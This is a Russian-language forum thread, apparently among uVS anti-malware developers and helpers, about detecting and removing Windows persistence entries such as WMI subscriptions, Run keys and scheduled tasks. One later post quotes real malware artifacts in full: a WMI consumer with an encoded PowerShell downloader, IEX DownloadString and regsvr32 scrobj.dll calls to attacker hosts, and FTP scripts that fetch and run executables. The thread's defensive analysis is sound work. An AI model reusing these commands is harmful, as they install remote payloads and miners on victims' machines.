PR55.RP55 78 Жалоба Опубликовано Декабрь 11, 2018 Windows 10 Pro x64 (NT v10.0 SP0) build 15063 [C:\WINDOWS] ----------------------- Полное имя {6\[CLSID] Имя файла [CLSID] Тек. статус в автозапуске Сохраненная информация на момент создания образа Статус в автозапуске Ссылки на объект Ссылка HKLM\Software\Classes\Wow6432Node\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance\{60BD49A6-240E-48ef-8D73-AC8244BE1D85}\CLSID ------------------------ Полное имя {E\[CLSID] Имя файла [CLSID] Тек. статус в автозапуске Сохраненная информация на момент создания образа Статус в автозапуске Ссылки на объект Ссылка HKLM\Software\Classes\Wow6432Node\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance\{EAC2F030-5937-414C-9B7A-6B57F7C072E8}\CLSID ------------------------ Тема\образ. http://www.tehnari.ru/f35/t262097/ Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
demkd 561 Жалоба Опубликовано Декабрь 12, 2018 7 часов назад, PR55.RP55 сказал: {6\[CLSID] содержимое ключа нужно, без него не починить. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
PR55.RP55 78 Жалоба Опубликовано Декабрь 13, 2018 Такая вот история. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
demkd 561 Жалоба Опубликовано Декабрь 13, 2018 33 минут назад, PR55.RP55 сказал: Такая вот история. и что не так? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
PR55.RP55 78 Жалоба Опубликовано Декабрь 14, 2018 11 часов назад, demkd сказал: и что не так? Почему в списке два процесса uVS - ? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
demkd 561 Жалоба Опубликовано Декабрь 14, 2018 2 часа назад, PR55.RP55 сказал: Почему в списке два процесса uVS - ? Windows 64-х битный потому и 2 процесса, один под эмулятором, второй 64-х битный. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
santy 149 Жалоба Опубликовано Декабрь 21, 2018 Цитата Добавлена поддержка WMI классов на базе __TimerInstruction. судя по свежему образу, видится запись в WMI Полное имя WMI:\\.\ROOT\SUBSCRIPTION\__INTERVALTIMERINSTRUCTION\FUCKYOUMM2_ITIMER Имя файла FUCKYOUMM2_ITIMER Тек. статус в автозапуске Сохраненная информация на момент создания образа Статус в автозапуске Namespace \\.\root\subscription Consumer_Class __IntervalTimerInstruction TimerId fuckyoumm2_itimer IntervalBetweenEvents 10800000 SkipIfPassed FALSE ANDREY-PC_2018-12-20_09-32-21_v4.1.2.7z Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
PR55.RP55 78 Жалоба Опубликовано Январь 6 В 21.12.2018 at 8:28 AM, santy сказал: Добавлена поддержка WMI классов на базе __TimerInstruction. И здесь: http://www.tehnari.ru/f183/t262393/ Сразу две записи: Полное имя WMI:\\.\ROOT\SUBSCRIPTION\__INTERVALTIMERINSTRUCTION\SETHOMEPAGE INTERVAL TIMER Имя файла SETHOMEPAGE INTERVAL TIMER Тек. статус в автозапуске Сохраненная информация на момент создания образа Статус в автозапуске Namespace \\.\root\subscription Consumer_Class __IntervalTimerInstruction TimerId SethomePage Interval Timer IntervalBetweenEvents 900000 SkipIfPassed FALSE -------------------- + .[EVENTFILTER SETHOMEPAGE2] Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
PR55.RP55 78 Жалоба Опубликовано Январь 6 + А здесь... Тема\образ: http://www.tehnari.ru/f35/t262401/ ------------------ Записи: FILE:///C:\PROGRAM FILES (X86)\HEWLETT-PACKARD\HP SUPPORT SOLUTIONS\MODULES\ACLMCONTROL.EXE C:\PROGRAM FILES (X86)\HEWLETT-PACKARD\HP SUPPORT SOLUTIONS\MODULES\ACLMCONTROL.EXE Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
PR55.RP55 78 Жалоба Опубликовано Январь 7 Тема: http://www.tehnari.ru/f35/t262401/ uVS видит запись: Ссылка HKEY_USERS\S-1-5-21-3928128571-3472622639-2727322988-1000\Software\Microsoft\Windows\CurrentVersion\Run\Vladislav Vladislav cmd.exe /c start www.dipladoks.org ------------ Но в автоскрипте не будет нормального удаления. По хорошему не должно быть никаких дополнительных команд. Только: delref Если команда отдана - то автоматически удаляются и всё задачи где есть запись: www.dipladoks.org И всё, что есть в автозапуске по: www.dipladoks.org и т.д. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
santy 149 Жалоба Опубликовано Январь 8 8 часов назад, PR55.RP55 сказал: Но в автоскрипте не будет нормального удаления. по этому образу в автоскрипте будут две команды: delref HTTP://WWW.DIPLADOKS.ORG/ delref WWW.DIPLADOKS.ORG вторая команда должна зачистить все ссылки и задачи, которые приведены в этом объекте Цитата Полное имя WWW.DIPLADOKS.ORG Имя файла WWW.DIPLADOKS.ORG Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске Удовлетворяет критериям RUN (ССЫЛКА ~ \CURRENTVERSION\RUN\)(1) AND (ЦИФР. ПОДПИСЬ !~ ДЕЙСТВИТЕЛЬНА)(1) [auto (0)] RUN.CMD (ССЫЛКА ~ \CURRENTVERSION\RUN\)(1) AND ( ~ CMD.EXE)(1) [auto (0)] KB-RIBAKI.ORG ( ~ REG ADD)(1) [auto (0)] Сохраненная информация на момент создания образа Статус в автозапуске Доп. информация на момент обновления списка Файл C:\WINDOWS\SYSTEM32\CMD.EXE CmdLine /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG" Ссылки на объект Ссылка C:\WINDOWS\SYSTEM32\TASKS\VLADISLAV Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A3E456D9-DFF9-4644-90AD-00597EAAA099}\Actions Actions "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org" Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{A3E456D9-DFF9-4644-90AD-00597EAAA099}\ Ссылка HKEY_USERS\S-1-5-21-3928128571-3472622639-2727322988-1000\Software\Microsoft\Windows\CurrentVersion\Run\Vladislav Vladislav cmd.exe /c start www.dipladoks.org Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
PR55.RP55 78 Жалоба Опубликовано Январь 8 В 08.01.2019 at 8:32 AM, santy сказал: вторая команда должна зачистить все ссылки и задачи, которые приведены в этом объекте Может и должна. В теме были применены две команды: deltsk WWW.DIPLADOKS.ORG delref HTTP://WWW.DIPLADOKS.ORG/ Но, как мы видим в FRST после этого осталась запись: HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start www.dipladoks.org -------------- "HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Vladislav" => removed successfully ------ Цитата 4.0.21 --------------------------------------------------------- o Добавлена возможность удалять события WMI и задачи без удаления всех ссылок на файл/объект. Скриптовые команды: delwmi и deltsk Исходя из этой логики команда: deltsk не удаляет ссылки. В 07.01.2019 at 11:48 PM, PR55.RP55 сказал: По хорошему не должно быть никаких дополнительных команд. Только: delref Если команда отдана - то автоматически удаляются и всё задачи где есть запись: www.dipladoks.org И всё, что есть в автозапуске по: www.dipladoks.org и т.д. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
santy 149 Жалоба Опубликовано Январь 8 если deltsk будет удалять и задачи, связанные с данным объектом и все ссылки в реестре на объект, тогда зачем нужен дубль команды, когда все это умеет делать delref. значит, эта команда (deltsk) введена для того чтобы удалить только задачи, связанные с объектом автозапуска. Например, сам объект автозапуска может быть даже с белой цифровой записью и содержит ряд полезных ссылок в реестре, которые необходимы для функционирования системы, но в тоже время может быть использован через левую задачу для деструктивных действий. Поэтому, в данном случае мы не можем применить delref к объекту, а только deltsk. (Очевидно, при этом будут удалены все задачи, связанные с данным объектом). Если необходимо удалить связанные с объектом задачи поштучно, в этом случае можно использовать контекстное удаление из info, например: del %Sys32%\TASKS\VLADISLAV, del %Sys32%\TASKS\VLADISLAV1, del %Sys32%\TASKS\VLADISLAV2 команда deltsk WWW.DIPLADOKS.ORG скорее всего была применена без внимания, что в автозапуске остался еще запуск по данной ссылке через ключ реестра. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
PR55.RP55 78 Жалоба Опубликовано Январь 8 santy Я говорю об удалении не всего, а только самой записи: www.dipladoks.org т.е. удаляется фрагмент\часть при 100% совпадении\соответствии. В данном случае удалению подлежит: www.dipladoks.org HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start www.dipladoks.org В итоге получим: HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start ----------- И в конце скрипта у нас идёт команда на удаление ссылок... удаляем отсутствующие объекты. Что уже давно проверено и безопасно и не будет затрагивать полезные ссылки в реестре. ----------- Проблема в том, что оператор не видит всей картины. Если бы была возможность создать поисковый запрос по всему Инфо. тогда оператор бы увидел все записи в _одном окне: Цитата Полное имя HTTP://WWW.DIPLADOKS.ORG/ Имя файла HTTP://WWW.DIPLADOKS.ORG/ CmdLine "C:\Program Files (x86)\Opera\57.0.3098.106\opera.exe" -noautoupdate --ran-launcher -- http://www.dipladoks.org/ Полное имя WWW.DIPLADOKS.ORG Имя файла WWW.DIPLADOKS.ORG CmdLine /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG" Actions "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org" Vladislav cmd.exe /c start www.dipladoks.org CmdLine "C:\Program Files (x86)\Opera\57.0.3098.106\opera.exe" -noautoupdate --ran-launcher -- http://www.dipladoks.org/ CmdLine /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG" CmdLine /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG" Actions "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org" Actions "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org" Vladislav cmd.exe /c start www.dipladoks.org Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
santy 149 Жалоба Опубликовано Январь 8 RP55, ничто не мешает оператору заглянуть внутрь инфо подозрительных объектов чтобы определиться какой командой лучше его зачистить из системы. или delall, или delref, или deltsk или достаточно просто использовать del, достаточно при этом использовать фильтрующее выражение и обе записи окажутся рядом. Цитата Если бы была возможность создать поисковый запрос по всему Инфо. тогда оператор бы увидел все записи в _одном окне: а вот каша из строк инфо, которые принадлежат разным объектам не нужна. отсутствие привязки этих строк к реальному объекту автозапуска из списка только затруднит выбор команды. скажем, тот же объект в cmdline может быть запущен из lnk файла, и вместо очистки командной строки в ярлыках будет запущено удаление ярлыков. --------- внутри info возможно фильтр не помешал бы, в тех случаях, когда на странице info большой объем информации задан Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
PR55.RP55 78 Жалоба Опубликовано Январь 8 В 08.01.2019 at 4:29 PM, santy сказал: каша из строк инфо, которые принадлежат разным объектам не нужна. Что мешает создать переход к нужному объекту ? Выполнили поиск > посмотрели информацию > переход к нужному объекту и на месте приняли решение. Или создать суммирующее окно Инфо. где будут все объекты и все ссылки удовлетворяющие запросу. С выделением результата поиска. В 08.01.2019 at 4:29 PM, santy сказал: внутри info возможно фильтр не помешал бы, в тех случаях, когда на странице info большой объем информации задан Давно нужно сделать. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
santy 149 Жалоба Опубликовано Январь 11 В 08.01.2019 at 5:52 PM, PR55.RP55 сказал: santy Я говорю об удалении не всего, а только самой записи: www.dipladoks.org т.е. удаляется фрагмент\часть при 100% совпадении\соответствии. В данном случае удалению подлежит: www.dipladoks.org HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start www.dipladoks.org В итоге получим: HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start ----------- И в конце скрипта у нас идёт команда на удаление ссылок... удаляем отсутствующие объекты. Что уже давно проверено и безопасно и не будет затрагивать полезные ссылки в реестре. ну, в данной строке HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start есть объекты, которые присутствуют в системе, поэтому вряд ли эта строка попадет под удаление отсутствующих объектов. в итоге, у юзера будет все время впустую стартовать cmd.exe, или браузер, или запускаться командное окно и .т.п. Частичное исправление параметров (без удаления ключа), если необходимо, решается сейчас твиками. например: regt 12 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
PR55.RP55 78 Жалоба Опубликовано Январь 11 santy Мне кажется, что идея с удалением фрагмента\части интересная. Единственно нужен такой метод при котором операция не будет приводить к негативным последствиям в виде старта cmd.exe, браузера, командных окон и т.д. твик regt 12 - команда возвращает запись в исходное значение... Значит сопоставив две записи: 1) Запись модифицированная 2) Исходная запись - которая сейчас содержится в твике. 3) Получаем разницу. 4) Эту разницу программа и обрабатывает. ----------- Нужен банк\база стандартных\регулярных исходных значений и отталкиваясь от этого и обработать объект. 8 часов назад, santy сказал: будет все время впустую стартовать cmd.exe, или браузер, или запускаться командное окно и .т.п. Или выявлять и удалять эти пустые\битые элементы. Что вроде бы и так реализовано. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
santy 149 Жалоба Опубликовано Январь 11 13 минут назад, PR55.RP55 сказал: Мне кажется, что идея с удалением фрагмента\части интересная. может и интересная, но в данном случае идея с очисткой ссылок и задач, реализованная в программе работает. командная строка (cmdline), которая может содержать чистые файлы (cmd.exe, wmic.exe, regsvr32.exe, explorer.exe и т.д., через которые могут быть выполнены деструктивные действия), разбивается на отдельные элементы списка автозапуска, и каждый элемент, который был выделен из командной строки, содержит всю инфо, из которой он был выделен. Т.о. если применяется delref к этим элементам, то удаляются из реестра или из tasks все параметры, ключи и actions запуска деструктивного действия. При этом, сам чистый файл не затрагивается, не удаляется, а удаляется только его деструктивное применение, прописанное через задачи, или ключи реестра. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
santy 149 Жалоба Опубликовано Январь 12 demkd, а здеcь странный получился разбор, хотя случай все тот же: Dark.Galaxy &miner хотя и посвежее случай. ;uVS v4.1.2 [http://dsrt.dyndns.org] [Windows 6.1.7601 SP1 Service Pack 1] ; WMI: обработчики событий Цитата ПОДОЗРИТ. | хттп]://173.208.139.170/2.TXT ПОДОЗРИТ. | хттп://35.182.171.137/3.TXT ПОДОЗРИТ. | хттп://WMI.1217BYE.HOST/1.TXT ПОДОЗРИТ. | SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('хттп://173.208.139.170/S.TXT')&POWERSHELL.EXE ПОДОЗРИТ. | SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('хттп://35.182.171.137/S.JPG')||REGSVR32 ПОДОЗРИТ. | SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('хттп://WMI.1217BYE.HOST/S.PS1')&POWERSHELL.EXE автозапуск | &POWERSHELL.EXE автозапуск | C:\WINDOWS\SYSTEM32\CSCRIPT.EXE автозапуск | KERNCAP.VBS автозапуск | WMI:\\.\ROOT\SUBSCRIPTION\NTEVENTLOGEVENTCONSUMER\SCM EVENT LOG CONSUMER.[SCM EVENT LOG FILTER] автозапуск | C:\WINDOWS\SYSTEM32\SCROBJ.DLL АЛЕКСЕЙ-HP_2019-01-11_21-19-41_v4.1.2.7z Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
demkd 561 Жалоба Опубликовано Январь 12 1 час назад, santy сказал: а здеcь странный получился разбор, хотя случай все тот же: Dark.Galaxy &miner хотя и посвежее случай. разобрать все многообразие командных строк просто невозможно, мусор всегда будет Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
santy 149 Жалоба Опубликовано Январь 12 похоже, какой-то новый подход используется, с комбинированием base64 и реального кода. consumer_name fuckyoumm4 и consumer_filter fuckyoumm3 засветились в инфо cmd.exe Цитата Полное имя C:\WINDOWS\SYSTEM32\CMD.EXE Имя файла CMD.EXE Тек. статус АКТИВНЫЙ ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную] Удовлетворяет критериям WMI_ACTIVESCRIPTEVENTCONSUMER.LIST(CONSUMER_NAME ~ FUCKYOUMM)(1) [delall (0)] TASK.MUSA (ССЫЛКА ~ TASKS\MYSA)(1) [auto (0)] Сохраненная информация на момент создания образа Статус АКТИВНЫЙ ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную] Процесс 64-х битный File_Id 4CE798E559000 Linker 9.0 Размер 345088 байт Создан 21.11.2010 в 06:23:55 Изменен 21.11.2010 в 06:23:55 TimeStamp 20.11.2010 в 09:46:13 EntryPoint + OS Version 0.1 Subsystem Windows character-mode user interface (CUI) subsystem IMAGE_FILE_DLL - IMAGE_FILE_EXECUTABLE_IMAGE + Тип файла 64-х битный ИСПОЛНЯЕМЫЙ Цифр. подпись Действительна, подписано Microsoft Windows Оригинальное имя Cmd.Exe.MUI Версия файла 6.1.7601.17514 (win7sp1_rtm.101119-1850) Описание Обработчик команд Windows Производитель Microsoft Corporation Доп. информация на момент обновления списка pid = 1708 Алексей-HP\Алексей CmdLine "C:\Windows\System32\cmd.exe" /c "color 17 & title AutorunsVTchecker & "C:\Users\CD86~1\AppData\Local\Temp\7ZipSfx.000\autorunsc64.exe" -accepteula -a * -vt -vs" Процесс создан 21:17:13 [2019.01.11] С момента создания 00:02:35 CPU 0,01% CPU (1 core) 0,01% parentid = 3136 pid = 1900 NT AUTHORITY\система CmdLine C:\Windows\system32\cmd.EXE /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe Процесс создан 21:06:50 [2019.01.11] С момента создания 00:12:58 CPU 0,00% CPU (1 core) 0,00% parentid = 1620 C:\WINDOWS\SYSTEM32\TASKENG.EXE CmdLine /C ECHO OPEN FTP.1226BYE.XYZ>S&ECHO TEST>>S&ECHO 1433>>S&ECHO BINARY>>S&ECHO GET A.EXE C:\WINDOWS\UPDATE.EXE>>S&ECHO BYE>>S&FTP -S:S&C:\WINDOWS\UPDATE.EXE CmdLine /C ECHO OPEN FTP.1226BYE.XYZ>P&ECHO TEST>>P&ECHO 1433>>P&ECHO GET S.DAT C:\WINDOWS\DEBUG\ITEM.DAT>>P&ECHO BYE>>P&FTP -S:P CmdLine /C ECHO OPEN FTP.1226BYE.XYZ>PS&ECHO TEST>>PS&ECHO 1433>>PS&ECHO GET S.RAR C:\WINDOWS\HELP\LSMOSEE.EXE>>PS&ECHO BYE>>PS&FTP -S:PS&C:\WINDOWS\HELP\LSMOSEE.EXE SHA1 0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8 MD5 5746BD7E255DD6A8AFA06F7C42C1BA41 Namespace \\.\root\subscription Consumer_Name fuckyoumm4 Consumer_Class CommandLineEventConsumer Consumer_CommandLineTemplatecmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll Filter_Name fuckyoumm3 Filter_Class __EventFilter Filter_Query SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' #MOF_Bind# instance of __FilterToConsumerBinding { Consumer = "CommandLineEventConsumer.Name=\"fuckyoumm4\""; Filter = "__EventFilter.Name=\"fuckyoumm3\""; }; #MOF_Event# instance of __EventFilter { EventNamespace = "root\\cimv2"; Name = "fuckyoumm3"; Query = "SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"; QueryLanguage = "WQL"; }; #MOF_Consumer# instance of CommandLineEventConsumer { CommandLineTemplate = "cmd /c powershell.exe -nop -enc \"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA==\"&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"; Name = "fuckyoumm4"; }; Ссылки на объект Ссылка C:\WINDOWS\SYSTEM32\TASKS\MYSA Ссылка C:\WINDOWS\SYSTEM32\TASKS\MYSA2 Ссылка C:\WINDOWS\SYSTEM32\TASKS\MYSA3 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
demkd 561 Жалоба Опубликовано Январь 12 26 минут назад, santy сказал: похоже, какой-то новый подход используется, с комбинированием base64 и реального кода. в принципе ничего нового, просто затрудняет машинный анализ вот и все, возможно есть смысл отдельно обрабатывать powershell и следить за его командной строкой если -enc то как то это выделять Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
santy 149 Жалоба Опубликовано Январь 12 42 минут назад, demkd сказал: возможно есть смысл отдельно обрабатывать powershell и следить за его командной строкой если -enc то как то это выделять а что здесь означает ключ -enc? закодированный объект? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
PR55.RP55 78 Жалоба Опубликовано Январь 12 Вот ещё по теме: ( http://wmi.1217 ) https://virusinfo.info/showthread.php?t=221283 и тут анализ угрозы: Оригинал: https://s.tencent.com/research/report/622.html Перевод: https://translate.google.com/translate?hl=ru&sl=zh-CN&u=https://s.tencent.com/research/report/622.html&prev=search Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты